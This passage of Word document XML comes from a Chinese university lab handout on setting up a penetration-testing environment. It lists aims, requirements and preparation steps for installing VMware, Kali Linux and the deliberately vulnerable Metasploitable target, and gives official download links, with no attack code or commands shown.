          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1417" w:right="1134" w:bottom="1134" w:left="1418" w:header="1134" w:footer="1134" w:gutter="0"/>
          <w:pgNumType w:start="1"/>
          <w:cols w:space="0" w:num="1"/>
          <w:docGrid w:type="linesAndChars" w:linePitch="312" w:charSpace="0"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1" w:right="-512" w:rightChars="-244"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>实验</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>一：渗透测试环境搭建</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1" w:right="-512" w:rightChars="-244"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pP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1、实验目的和要求</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Cs w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>了解渗透测试基本概念，理解漏洞及渗透测试的工作原理，掌握测试环境搭建过程。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>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宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>了解搭建测试环境所需的主要设备和操作系统等，使用</w:t>
      </w:r>
      <w:bookmarkStart w:id="1" w:name="_Hlk98340303"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>VMware Workstation软件搭建Kali Linux作为渗透测试实验平台</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，搭建Metasploitable作为渗透测试目标。</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Times New Roman" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>渗透测试环境搭建实验的目的是让学习者能够理解和掌握渗透测试的基础知识和技能，并通过搭建环境来实际练习渗透测试的过程。这样可以让学习者更深入地了解渗透测试的流程和操作方法，并且可以在实际操作中发现和解决问题，提高渗透测试的实际应用能力。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>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ascii="Times New Roman" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>搭建过程包括：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>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Chars="0"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>虚拟机的搭建：VMware Workstation的安装；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>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Chars="0"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Kali Linux系统的安装：下载 Kali Linux镜像，镜像下载完成后在VMware中新建一个虚拟机，安装Kali Linux。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>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Chars="0"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Metasploitable 环境的搭建。</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Cs w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>渗透测试环境搭建成功测试。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:bidi w:val="0"/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="482"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>重点：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>漏洞和渗透的工作原理。</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Cs w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>难点：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>渗透测试环境的搭建。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:bidi w:val="0"/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="482"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>要求如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:bidi w:val="0"/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="482"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1.熟悉基本的网络知识和操作系统知识。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:bidi w:val="0"/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="482"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2.具备一定的Linux操作系统使用经验。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:bidi w:val="0"/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="482"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>3.掌握渗透测试的基础知识和技能。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:bidi w:val="0"/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="482"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4.了解渗透测试工具的使用和原理。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:bidi w:val="0"/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="482"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>5.具备一定的信息安全意识和法律法规意识，保证渗透测试行为合法合规。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:bidi w:val="0"/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="482"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>6.能够独立完成渗透测试环境的搭建和相关实验。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="-4" w:leftChars="-2" w:right="-512" w:rightChars="-244"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>2、实验准备工作</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Cs w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1）学习渗透测试基础知识；</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sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>（2）安装VMware Workstation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>；</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Cs w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>3）在VM（VMware Workstation）虚拟机上安装Kali Linux，建立MSF环境；</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Cs w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>（4）在VM虚拟机上安装Metasploitable，建立靶场测试环境。</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Cs w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>（5）在VM虚拟机上安装WindowsXP或Windows7系统作为测试环境。</w:t>
      </w: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3、实验内容及步骤</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>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具有渗透测试的基本知识，了解渗透测试基本流程</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="16"/>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Chars="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在VMware Workstation官网下载VMware虚拟机，网址如下：（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://www.vmware.com/cn/products/workstation-pro/workstation-pro-evaluation.html" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="15"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>https://www.vmware.com/cn/products/workstation-pro/workstation-pro-evaluation.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="15"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="16"/>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Chars="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准备Kali Linux和Metasploitable的镜像文件，网址如下：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Kali Linux：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://www.kali.org/get-kali/" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="15"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>https://www.kali.org/get-kali/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="15"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="auto"/>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Metasploitable：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://github.com/rapid7/metasploitable3" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="15"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>https://github.com/rapid7/metasploitable3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="15"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4D4D4D"/>
          <w:spacing w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4D4D4D"/>
          <w:spacing w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
